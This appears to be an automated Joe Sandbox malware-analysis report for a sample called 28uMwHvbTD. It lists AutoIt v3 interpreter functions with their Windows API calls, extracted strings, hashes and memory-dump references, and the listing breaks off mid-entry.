API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 610f752cf0143c63e0e96a53c7ca0738f528793678f73527af29fc5a8fbaad6e
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 7F41C171D1051CEBCF48CFADC991AAEFBF2AF88201F548299D516AB345D730AB41DB90

Function 012FE970 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1396408167.00000000012FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 012FB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fb000_28uMwHvbTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 877abb5c4791e065edd2770cc06f1414e8a39dab25a0ef49c92e9434262d9b92
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 0B01D278A10109EFCB85DF98C5909AEF7B5FF48310F2185A9DA09A7311D730AE41DB90

Function 012FE9D0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1396408167.00000000012FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 012FB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fb000_28uMwHvbTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 3a18cf02237788c6b08f096b28af00de9448a28fdd14d6bf519c8cf72152e782
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 01019279A10109EFCB45DF98C5909AEF7B5FF48310F2186A9E909A7311D730AE41DF80

Function 012FD330 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1396408167.00000000012FB000.00000040.00000020.00020000.00000000.sdmp, Offset: 012FB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fb000_28uMwHvbTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 007B7806 Relevance: 79.2, APIs: 40, Strings: 5, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 007B785B
DeleteObject.GDI32(00000000), ref: 007B786D
DestroyWindow.USER32 ref: 007B787B
GetDesktopWindow.USER32 ref: 007B7895
GetWindowRect.USER32(00000000), ref: 007B789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007B79DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007B79ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7A35
GetClientRect.USER32(00000000,?), ref: 007B7A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007B7A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7ABB
GlobalLock.KERNEL32(00000000), ref: 007B7AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7AD3
GlobalUnlock.KERNEL32(00000000), ref: 007B7ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7AE3
GlobalFree.KERNEL32(00000000), ref: 007B7AEE
CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 007B7B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007D2CAC,00000000), ref: 007B7B16
GlobalFree.KERNEL32(00000000), ref: 007B7B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007B7B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007B7B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007B7D7A

Strings

static, xrefs: 007B7A75, 007B7BCC
AutoIt v3, xrefs: 007B7A2D
@U=u, xrefs: 007B7B6B, 007B7CFA
DISPLAY, xrefs: 007B7BDD
, xrefs: 007B7D00

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $@U=u$AutoIt v3$DISPLAY$static
API String ID: 2211948467-3613752883
Opcode ID: ef108cf3ba6e7405504d6d12d22422713eda0b7825c237972266db7e875f8680
Instruction ID: f1a29fe9275735bef0ee354c7e16707575d53a807dc4830446c19511dba7db16
Opcode Fuzzy Hash: ef108cf3ba6e7405504d6d12d22422713eda0b7825c237972266db7e875f8680
Instruction Fuzzy Hash: 89025B71900119EFDB14DFA8DC89EAE7BB9FF88310F148159F915AB2A1C778AD01CB64

Function 007CA5DA Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 007CA630
GetSysColorBrush.USER32(0000000F), ref: 007CA661
GetSysColor.USER32(0000000F), ref: 007CA66D
SetBkColor.GDI32(?,000000FF), ref: 007CA687
SelectObject.GDI32(?,00000000), ref: 007CA696
InflateRect.USER32(?,000000FF,000000FF), ref: 007CA6C1
GetSysColor.USER32(00000010), ref: 007CA6C9
CreateSolidBrush.GDI32(00000000), ref: 007CA6D0
FrameRect.USER32(?,?,00000000), ref: 007CA6DF
DeleteObject.GDI32(00000000), ref: 007CA6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 007CA731
FillRect.USER32(?,?,00000000), ref: 007CA763
GetWindowLongW.USER32(?,000000F0), ref: 007CA78E

Part of subcall function 007CA8CA: GetSysColor.USER32(00000012), ref: 007CA903
Part of subcall function 007CA8CA: SetTextColor.GDI32(?,?), ref: 007CA907
Part of subcall function 007CA8CA: GetSysColorBrush.USER32(0000000F), ref: 007CA91D
Part of subcall function 007CA8CA: GetSysColor.USER32(0000000F), ref: 007CA928
Part of subcall function 007CA8CA: GetSysColor.USER32(00000011), ref: 007CA945
Part of subcall function 007CA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007CA953
Part of subcall function 007CA8CA: SelectObject.GDI32(?,00000000), ref: 007CA964
Part of subcall function 007CA8CA: SetBkColor.GDI32(?,00000000), ref: 007CA96D
Part of subcall function 007CA8CA: SelectObject.GDI32(?,?), ref: 007CA97A
Part of subcall function 007CA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 007CA999
Part of subcall function 007CA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007CA9B0
Part of subcall function 007CA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 007CA9C5
Part of subcall function 007CA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007CA9ED

Strings

@U=u, xrefs: 007CA7B8

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID: @U=u
API String ID: 3521893082-2594219639
Opcode ID: 7780022fec5af48eb032988494772a41b273948eb35dd80ede3c2d10853aa47a
Instruction ID: 8486f0e4ea03096e5d65ea85ac273e0788774fe0efde1c4212a6ce0b78067e58
Opcode Fuzzy Hash: 7780022fec5af48eb032988494772a41b273948eb35dd80ede3c2d10853aa47a
Instruction Fuzzy Hash: B2917B72408305FFC7119F64DC08E5B7BAAFB88325F148A2DFA62E61A0D739D944CB56

Function 007C356B Relevance: 52.9, APIs: 6, Strings: 24, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,007CF910), ref: 007C3627
IsWindowVisible.USER32(?), ref: 007C364B

Strings

GETLINECOUNT, xrefs: 007C38C6
ISCHECKED, xrefs: 007C3839
ADDSTRING, xrefs: 007C3716
TABLEFT, xrefs: 007C3687
ISENABLED, xrefs: 007C366B
SETCURRENTSELECTION, xrefs: 007C37B6
@U=u, xrefs: 007C38E3, 007C390A, 007C3993
GETSELECTED, xrefs: 007C38A3
UNCHECK, xrefs: 007C3883
SELECTSTRING, xrefs: 007C3806
EDITPASTE, xrefs: 007C395F
ISVISIBLE, xrefs: 007C3637
DELSTRING, xrefs: 007C3749
FINDSTRING, xrefs: 007C3776
CHECK, xrefs: 007C386D
SENDCOMMANDID, xrefs: 007C39DA
CURRENTTAB, xrefs: 007C36BD
GETCURRENTCOL, xrefs: 007C3928
HIDEDROPDOWN, xrefs: 007C3700
SHOWDROPDOWN, xrefs: 007C36E0
GETLINE, xrefs: 007C399B
GETCURRENTLINE, xrefs: 007C38ED
TABRIGHT, xrefs: 007C369D
GETCURRENTSELECTION, xrefs: 007C37E3

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: @U=u$ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-3469695742
Opcode ID: f9f21b9f530f38543c9a817b54231609352b1fe40e35487c055b90ddc88c5feb
Instruction ID: ed58683c2b1cc2f79cb1a5a095ecf45c0ef6e594f4d29ff6fcdd97e6cad642e8
Opcode Fuzzy Hash: f9f21b9f530f38543c9a817b54231609352b1fe40e35487c055b90ddc88c5feb
Instruction Fuzzy Hash: 39D14B70204301DBCA14EF14C459F6E77A5AF95394F14C46CF9865B3A2DB39EA0ACB92

Function 007B74AB Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 007B74DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007B759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007B75DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007B75ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007B7633
GetClientRect.USER32(00000000,?), ref: 007B763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007B7683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007B7692
GetStockObject.GDI32(00000011), ref: 007B76A2
SelectObject.GDI32(00000000,00000000), ref: 007B76A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007B76B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007B76BF
DeleteDC.GDI32(00000000), ref: 007B76C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007B76F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 007B770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007B7746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007B775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 007B776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007B779B
GetStockObject.GDI32(00000011), ref: 007B77A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007B77B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007B77BB

Strings

static, xrefs: 007B767D, 007B7795
AutoIt v3, xrefs: 007B762B
msctls_progress32, xrefs: 007B773C
@U=u, xrefs: 007B76FA
DISPLAY, xrefs: 007B7688

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-2771358697
Opcode ID: 65d2829fb72fd215d729f91dec99618ed786c18fe63edf24bf78f46f46961d9a
Instruction ID: c35ccd1489caf5bdd8479e5c2fb1a4c78477aa46ca96d90d4c9bee051892d962
Opcode Fuzzy Hash: 65d2829fb72fd215d729f91dec99618ed786c18fe63edf24bf78f46f46961d9a
Instruction Fuzzy Hash: 49A140B1A40619BFEB14DBA4DC4AFAF7B6AEF45710F008118FA15A72E0D774AD10CB64

Function 007CA8CA Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 007CA903
SetTextColor.GDI32(?,?), ref: 007CA907
GetSysColorBrush.USER32(0000000F), ref: 007CA91D
GetSysColor.USER32(0000000F), ref: 007CA928
CreateSolidBrush.GDI32(?), ref: 007CA92D
GetSysColor.USER32(00000011), ref: 007CA945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 007CA953
SelectObject.GDI32(?,00000000), ref: 007CA964
SetBkColor.GDI32(?,00000000), ref: 007CA96D
SelectObject.GDI32(?,?), ref: 007CA97A
InflateRect.USER32(?,000000FF,000000FF), ref: 007CA999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007CA9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 007CA9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007CA9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007CAA14
InflateRect.USER32(?,000000FD,000000FD), ref: 007CAA32
DrawFocusRect.USER32(?,?), ref: 007CAA3D
GetSysColor.USER32(00000011), ref: 007CAA4B
SetTextColor.GDI32(?,00000000), ref: 007CAA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007CAA67
SelectObject.GDI32(?,007CA5FA), ref: 007CAA7E
DeleteObject.GDI32(?), ref: 007CAA89
SelectObject.GDI32(?,?), ref: 007CAA8F
DeleteObject.GDI32(?), ref: 007CAA94
SetTextColor.GDI32(?,?), ref: 007CAA9A
SetBkColor.GDI32(?,?), ref: 007CAAA4

Strings

@U=u, xrefs: 007CA9ED

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID: @U=u
API String ID: 1996641542-2594219639
Opcode ID: 925e696ad0916b0b0fca508a295dd185c9ee50034c8e122747aa22cec45c44e5
Instruction ID: b8399eb89a7d36e82252043013ec3811d58e9a3031d39f9765cd517932cd6855
Opcode Fuzzy Hash: 925e696ad0916b0b0fca508a295dd185c9ee50034c8e122747aa22cec45c44e5
Instruction Fuzzy Hash: F6515E71900208FFDF109FA4DC49EAE7B7AEF08321F158629F911AB2A1D7799940CF94

Function 007AAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007AAD1E
GetDriveTypeW.KERNEL32(?,007CFAC0,?,\\.\,007CF910), ref: 007AADFB
SetErrorMode.KERNEL32(00000000,007CFAC0,?,\\.\,007CF910), ref: 007AAF59

Strings

SSA, xrefs: 007AAEE2
Fibre, xrefs: 007AAEE9
Removable, xrefs: 007AAE4D
ATAPI, xrefs: 007AAECD
RAID, xrefs: 007AAEF7
SATA, xrefs: 007AAF0C
SAS, xrefs: 007AAF05
\\.\, xrefs: 007AAD70
ATA, xrefs: 007AAED4
SSD, xrefs: 007AAE86
Unknown, xrefs: 007AAE1B, 007AAEBF
PhysicalDrive, xrefs: 007AADA7
Virtual, xrefs: 007AAF21
1394, xrefs: 007AAEDB
SCSI, xrefs: 007AAEC6
FileBackedVirtual, xrefs: 007AAF28
RAMDisk, xrefs: 007AAE25
Network, xrefs: 007AAE39
USB, xrefs: 007AAEF0
iSCSI, xrefs: 007AAEFE
Fixed, xrefs: 007AAE43
MMC, xrefs: 007AAF1A
CDROM, xrefs: 007AAE2F

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: dfd420bce94a2c1efce0f71e3f6a9cea95ef7496516f40c7e394e1b42d5775a9
Instruction ID: 6c752b23b4da5e1e008de435036fef2d8930f4e821b3cd5cfb9c33b422599295
Opcode Fuzzy Hash: dfd420bce94a2c1efce0f71e3f6a9cea95ef7496516f40c7e394e1b42d5775a9
Instruction Fuzzy Hash: 98516FF0649209FF8B58DB10C986CBD73A1EB8A700720865BE506A7391DB3DDD45DB53

Function 00742C18 Relevance: 44.2, APIs: 23, Strings: 2, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00742CA2
DeleteObject.GDI32(00000000), ref: 00742CE8
DeleteObject.GDI32(00000000), ref: 00742CF3
DestroyCursor.USER32(00000000), ref: 00742CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00742D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0077C43B
6FB80200.COMCTL32(?,000000FF,?), ref: 0077C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0077C89D

Part of subcall function 00741B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00742036,?,00000000,?,?,?,?,007416CB,00000000,?), ref: 00741B9A

SendMessageW.USER32(?,00001053), ref: 0077C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0077C8F1

Strings

0, xrefs: 0077C731
@U=u, xrefs: 0077C43B, 0077C542, 0077C81D

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: DestroyMessageSendWindow$DeleteObject$B80200CursorInvalidateMoveRect
String ID: 0$@U=u
API String ID: 295266683-975001249
Opcode ID: b14b242eec6f258b203eb162acfc5966db3a1a4fb0d189c16054f4058d83d3a8
Instruction ID: 617f2b4ec1abd4e4e13e99c4dacd08862f385f7176940581c5d7ca4826227588
Opcode Fuzzy Hash: b14b242eec6f258b203eb162acfc5966db3a1a4fb0d189c16054f4058d83d3a8
Instruction Fuzzy Hash: 48127F30604201EFDB16CF24C888BA9B7E5FF49350F54856DF559DB262CB39E862CBA1

Function 007C9A1C Relevance: 44.2, APIs: 23, Strings: 2, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 007C9AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 007C9B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 007C9BA7

Strings

@U=u, xrefs: 007C9B8B, 007C9BA7, 007C9D23, 007C9D56, 007C9DB6, 007C9E00, 007C9E60, 007C9E84, 007C9F40
0, xrefs: 007C9BE4

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0$@U=u
API String ID: 2326795674-975001249
Opcode ID: bf46653c387dd44495afdf9894614ef4ef53c29cffc0fce6de108ff968b319a1
Instruction ID: 7a679f2d8065575b426b32928af64d0aaf75a58aa5297c428919a17142d93e26
Opcode Fuzzy Hash: bf46653c387dd44495afdf9894614ef4ef53c29cffc0fce6de108ff968b319a1
Instruction Fuzzy Hash: 4A02CD31204201AFEB65CF24C88DFAABBE5FF49314F04852DFA99D62A1D738D944CB52

Function 007468DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00746931
__wcsnicmp.LIBCMT ref: 00746949
__wcsnicmp.LIBCMT ref: 00746961
__wcsnicmp.LIBCMT ref: 00746979
__wcsnicmp.LIBCMT ref: 00746991
__wcsnicmp.LIBCMT ref: 007469A9
__wcsnicmp.LIBCMT ref: 007469C1
__wcsnicmp.LIBCMT ref: 007469D5
__wcsnicmp.LIBCMT ref: 00746A16
__wcsnicmp.LIBCMT ref: 00746A2A
__wcsnicmp.LIBCMT ref: 00746A3E
__wcsnicmp.LIBCMT ref: 00746A52

Strings

#requireadmin, xrefs: 0074695B
#comments-start, xrefs: 007469BB, 00746A10
#include, xrefs: 007469A3
Unterminated group of comments, xrefs: 0077E403
#notrayicon, xrefs: 00746943
#cs, xrefs: 007469CF, 00746A24
Bad directive syntax error, xrefs: 0077E31A
Cannot parse #include, xrefs: 0077E3F0
#include-once, xrefs: 0074698B
#comments-end, xrefs: 00746A38
#ce, xrefs: 00746A4C
#OnAutoItStartRegister, xrefs: 00746973
#pragma compile, xrefs: 0074692B

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
